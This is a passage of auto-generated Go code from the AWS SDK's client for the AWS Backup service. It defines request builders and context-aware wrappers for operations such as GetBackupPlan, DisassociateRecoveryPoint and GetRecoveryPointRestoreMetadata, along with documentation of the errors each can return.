return out, req.Send()
}
const opDescribeRestoreJob = "DescribeRestoreJob"
// DescribeRestoreJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRestoreJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRestoreJob for more information on using the DescribeRestoreJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRestoreJobRequest method.
// req, resp := client.DescribeRestoreJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRestoreJob
func (c *Backup) DescribeRestoreJobRequest(input *DescribeRestoreJobInput) (req *request.Request, output *DescribeRestoreJobOutput) {
op := &request.Operation{
Name: opDescribeRestoreJob,
HTTPMethod: "GET",
HTTPPath: "/restore-jobs/{restoreJobId}",
}
if input == nil {
input = &DescribeRestoreJobInput{}
}
output = &DescribeRestoreJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRestoreJob API operation for AWS Backup.
//
// Returns metadata associated with a restore job that is specified by a job
// ID.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRestoreJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * DependencyFailureException
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRestoreJob
func (c *Backup) DescribeRestoreJob(input *DescribeRestoreJobInput) (*DescribeRestoreJobOutput, error) {
req, out := c.DescribeRestoreJobRequest(input)
return out, req.Send()
}
// DescribeRestoreJobWithContext is the same as DescribeRestoreJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRestoreJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRestoreJobWithContext(ctx aws.Context, input *DescribeRestoreJobInput, opts ...request.Option) (*DescribeRestoreJobOutput, error) {
req, out := c.DescribeRestoreJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDisassociateRecoveryPoint = "DisassociateRecoveryPoint"
// DisassociateRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DisassociateRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DisassociateRecoveryPoint for more information on using the DisassociateRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DisassociateRecoveryPointRequest method.
// req, resp := client.DisassociateRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DisassociateRecoveryPoint
func (c *Backup) DisassociateRecoveryPointRequest(input *DisassociateRecoveryPointInput) (req *request.Request, output *DisassociateRecoveryPointOutput) {
op := &request.Operation{
Name: opDisassociateRecoveryPoint,
HTTPMethod: "POST",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}/disassociate",
}
if input == nil {
input = &DisassociateRecoveryPointInput{}
}
output = &DisassociateRecoveryPointOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DisassociateRecoveryPoint API operation for AWS Backup.
//
// Deletes the specified continuous backup recovery point from AWS Backup and
// releases control of that continuous backup to the source service, such as
// Amazon RDS. The source service will continue to create and retain continuous
// backups using the lifecycle that you specified in your original backup plan.
//
// Does not support snapshot backup recovery points.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DisassociateRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidResourceStateException
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DisassociateRecoveryPoint
func (c *Backup) DisassociateRecoveryPoint(input *DisassociateRecoveryPointInput) (*DisassociateRecoveryPointOutput, error) {
req, out := c.DisassociateRecoveryPointRequest(input)
return out, req.Send()
}
// DisassociateRecoveryPointWithContext is the same as DisassociateRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DisassociateRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DisassociateRecoveryPointWithContext(ctx aws.Context, input *DisassociateRecoveryPointInput, opts ...request.Option) (*DisassociateRecoveryPointOutput, error) {
req, out := c.DisassociateRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opExportBackupPlanTemplate = "ExportBackupPlanTemplate"
// ExportBackupPlanTemplateRequest generates a "aws/request.Request" representing the
// client's request for the ExportBackupPlanTemplate operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ExportBackupPlanTemplate for more information on using the ExportBackupPlanTemplate
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ExportBackupPlanTemplateRequest method.
// req, resp := client.ExportBackupPlanTemplateRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ExportBackupPlanTemplate
func (c *Backup) ExportBackupPlanTemplateRequest(input *ExportBackupPlanTemplateInput) (req *request.Request, output *ExportBackupPlanTemplateOutput) {
op := &request.Operation{
Name: opExportBackupPlanTemplate,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/toTemplate/",
}
if input == nil {
input = &ExportBackupPlanTemplateInput{}
}
output = &ExportBackupPlanTemplateOutput{}
req = c.newRequest(op, input, output)
return
}
// ExportBackupPlanTemplate API operation for AWS Backup.
//
// Returns the backup plan that is specified by the plan ID as a backup template.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ExportBackupPlanTemplate for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ExportBackupPlanTemplate
func (c *Backup) ExportBackupPlanTemplate(input *ExportBackupPlanTemplateInput) (*ExportBackupPlanTemplateOutput, error) {
req, out := c.ExportBackupPlanTemplateRequest(input)
return out, req.Send()
}
// ExportBackupPlanTemplateWithContext is the same as ExportBackupPlanTemplate with the addition of
// the ability to pass a context and additional request options.
//
// See ExportBackupPlanTemplate for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ExportBackupPlanTemplateWithContext(ctx aws.Context, input *ExportBackupPlanTemplateInput, opts ...request.Option) (*ExportBackupPlanTemplateOutput, error) {
req, out := c.ExportBackupPlanTemplateRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupPlan = "GetBackupPlan"
// GetBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlan for more information on using the GetBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanRequest method.
// req, resp := client.GetBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlan
func (c *Backup) GetBackupPlanRequest(input *GetBackupPlanInput) (req *request.Request, output *GetBackupPlanOutput) {
op := &request.Operation{
Name: opGetBackupPlan,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/",
}
if input == nil {
input = &GetBackupPlanInput{}
}
output = &GetBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlan API operation for AWS Backup.
//
// Returns BackupPlan details for the specified BackupPlanId. The details are
// the body of a backup plan in JSON format, in addition to plan metadata.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlan
func (c *Backup) GetBackupPlan(input *GetBackupPlanInput) (*GetBackupPlanOutput, error) {
req, out := c.GetBackupPlanRequest(input)
return out, req.Send()
}
// GetBackupPlanWithContext is the same as GetBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanWithContext(ctx aws.Context, input *GetBackupPlanInput, opts ...request.Option) (*GetBackupPlanOutput, error) {
req, out := c.GetBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupPlanFromJSON = "GetBackupPlanFromJSON"
// GetBackupPlanFromJSONRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlanFromJSON operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlanFromJSON for more information on using the GetBackupPlanFromJSON
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanFromJSONRequest method.
// req, resp := client.GetBackupPlanFromJSONRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON
func (c *Backup) GetBackupPlanFromJSONRequest(input *GetBackupPlanFromJSONInput) (req *request.Request, output *GetBackupPlanFromJSONOutput) {
op := &request.Operation{
Name: opGetBackupPlanFromJSON,
HTTPMethod: "POST",
HTTPPath: "/backup/template/json/toPlan",
}
if input == nil {
input = &GetBackupPlanFromJSONInput{}
}
output = &GetBackupPlanFromJSONOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlanFromJSON API operation for AWS Backup.
//
// Returns a valid JSON document specifying a backup plan or an error.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlanFromJSON for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON
func (c *Backup) GetBackupPlanFromJSON(input *GetBackupPlanFromJSONInput) (*GetBackupPlanFromJSONOutput, error) {
req, out := c.GetBackupPlanFromJSONRequest(input)
return out, req.Send()
}
// GetBackupPlanFromJSONWithContext is the same as GetBackupPlanFromJSON with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlanFromJSON for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanFromJSONWithContext(ctx aws.Context, input *GetBackupPlanFromJSONInput, opts ...request.Option) (*GetBackupPlanFromJSONOutput, error) {
req, out := c.GetBackupPlanFromJSONRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupPlanFromTemplate = "GetBackupPlanFromTemplate"
// GetBackupPlanFromTemplateRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlanFromTemplate operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlanFromTemplate for more information on using the GetBackupPlanFromTemplate
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanFromTemplateRequest method.
// req, resp := client.GetBackupPlanFromTemplateRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate
func (c *Backup) GetBackupPlanFromTemplateRequest(input *GetBackupPlanFromTemplateInput) (req *request.Request, output *GetBackupPlanFromTemplateOutput) {
op := &request.Operation{
Name: opGetBackupPlanFromTemplate,
HTTPMethod: "GET",
HTTPPath: "/backup/template/plans/{templateId}/toPlan",
}
if input == nil {
input = &GetBackupPlanFromTemplateInput{}
}
output = &GetBackupPlanFromTemplateOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlanFromTemplate API operation for AWS Backup.
//
// Returns the template specified by its templateId as a backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlanFromTemplate for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate
func (c *Backup) GetBackupPlanFromTemplate(input *GetBackupPlanFromTemplateInput) (*GetBackupPlanFromTemplateOutput, error) {
req, out := c.GetBackupPlanFromTemplateRequest(input)
return out, req.Send()
}
// GetBackupPlanFromTemplateWithContext is the same as GetBackupPlanFromTemplate with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlanFromTemplate for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanFromTemplateWithContext(ctx aws.Context, input *GetBackupPlanFromTemplateInput, opts ...request.Option) (*GetBackupPlanFromTemplateOutput, error) {
req, out := c.GetBackupPlanFromTemplateRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupSelection = "GetBackupSelection"
// GetBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupSelection for more information on using the GetBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupSelectionRequest method.
// req, resp := client.GetBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupSelection
func (c *Backup) GetBackupSelectionRequest(input *GetBackupSelectionInput) (req *request.Request, output *GetBackupSelectionOutput) {
op := &request.Operation{
Name: opGetBackupSelection,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/selections/{selectionId}",
}
if input == nil {
input = &GetBackupSelectionInput{}
}
output = &GetBackupSelectionOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupSelection API operation for AWS Backup.
//
// Returns selection metadata and a document in JSON format that specifies a
// list of resources that are associated with a backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupSelection for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupSelection
func (c *Backup) GetBackupSelection(input *GetBackupSelectionInput) (*GetBackupSelectionOutput, error) {
req, out := c.GetBackupSelectionRequest(input)
return out, req.Send()
}
// GetBackupSelectionWithContext is the same as GetBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupSelectionWithContext(ctx aws.Context, input *GetBackupSelectionInput, opts ...request.Option) (*GetBackupSelectionOutput, error) {
req, out := c.GetBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupVaultAccessPolicy = "GetBackupVaultAccessPolicy"
// GetBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupVaultAccessPolicy for more information on using the GetBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupVaultAccessPolicyRequest method.
// req, resp := client.GetBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultAccessPolicy
func (c *Backup) GetBackupVaultAccessPolicyRequest(input *GetBackupVaultAccessPolicyInput) (req *request.Request, output *GetBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opGetBackupVaultAccessPolicy,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &GetBackupVaultAccessPolicyInput{}
}
output = &GetBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupVaultAccessPolicy API operation for AWS Backup.
//
// Returns the access policy document that is associated with the named backup
// vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultAccessPolicy
func (c *Backup) GetBackupVaultAccessPolicy(input *GetBackupVaultAccessPolicyInput) (*GetBackupVaultAccessPolicyOutput, error) {
req, out := c.GetBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// GetBackupVaultAccessPolicyWithContext is the same as GetBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupVaultAccessPolicyWithContext(ctx aws.Context, input *GetBackupVaultAccessPolicyInput, opts ...request.Option) (*GetBackupVaultAccessPolicyOutput, error) {
req, out := c.GetBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupVaultNotifications = "GetBackupVaultNotifications"
// GetBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupVaultNotifications for more information on using the GetBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupVaultNotificationsRequest method.
// req, resp := client.GetBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultNotifications
func (c *Backup) GetBackupVaultNotificationsRequest(input *GetBackupVaultNotificationsInput) (req *request.Request, output *GetBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opGetBackupVaultNotifications,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &GetBackupVaultNotificationsInput{}
}
output = &GetBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupVaultNotifications API operation for AWS Backup.
//
// Returns event notifications for the specified backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultNotifications
func (c *Backup) GetBackupVaultNotifications(input *GetBackupVaultNotificationsInput) (*GetBackupVaultNotificationsOutput, error) {
req, out := c.GetBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// GetBackupVaultNotificationsWithContext is the same as GetBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupVaultNotificationsWithContext(ctx aws.Context, input *GetBackupVaultNotificationsInput, opts ...request.Option) (*GetBackupVaultNotificationsOutput, error) {
req, out := c.GetBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetRecoveryPointRestoreMetadata = "GetRecoveryPointRestoreMetadata"
// GetRecoveryPointRestoreMetadataRequest generates a "aws/request.Request" representing the
// client's request for the GetRecoveryPointRestoreMetadata operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetRecoveryPointRestoreMetadata for more information on using the GetRecoveryPointRestoreMetadata
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetRecoveryPointRestoreMetadataRequest method.
// req, resp := client.GetRecoveryPointRestoreMetadataRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetRecoveryPointRestoreMetadata
func (c *Backup) GetRecoveryPointRestoreMetadataRequest(input *GetRecoveryPointRestoreMetadataInput) (req *request.Request, output *GetRecoveryPointRestoreMetadataOutput) {
op := &request.Operation{
Name: opGetRecoveryPointRestoreMetadata,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}/restore-metadata",
}
if input == nil {
input = &GetRecoveryPointRestoreMetadataInput{}
}
output = &GetRecoveryPointRestoreMetadataOutput{}
req = c.newRequest(op, input, output)
return
}
// GetRecoveryPointRestoreMetadata API operation for AWS Backup.
//
// Returns a set of metadata key-value pairs that were used to create the backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetRecoveryPointRestoreMetadata for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetRecoveryPointRestoreMetadata
func (c *Backup) GetRecoveryPointRestoreMetadata(input *GetRecoveryPointRestoreMetadataInput) (*GetRecoveryPointRestoreMetadataOutput, error) {
req, out := c.GetRecoveryPointRestoreMetadataRequest(input)
return out, req.Send()
}
// GetRecoveryPointRestoreMetadataWithContext is the same as GetRecoveryPointRestoreMetadata with the addition of
// the ability to pass a context and additional request options.
//
// See GetRecoveryPointRestoreMetadata for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetRecoveryPointRestoreMetadataWithContext(ctx aws.Context, input *GetRecoveryPointRestoreMetadataInput, opts ...request.Option) (*GetRecoveryPointRestoreMetadataOutput, error) {
req, out := c.GetRecoveryPointRestoreMetadataRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetSupportedResourceTypes = "GetSupportedResourceTypes"
// GetSupportedResourceTypesRequest generates a "aws/request.Request" representing the
// client's request for the GetSupportedResourceTypes operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetSupportedResourceTypes for more information on using the GetSupportedResourceTypes
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetSupportedResourceTypesRequest method.
// req, resp := client.GetSupportedResourceTypesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetSupportedResourceTypes
func (c *Backup) GetSupportedResourceTypesRequest(input *GetSupportedResourceTypesInput) (req *request.Request, output *GetSupportedResourceTypesOutput) {
op := &request.Operation{
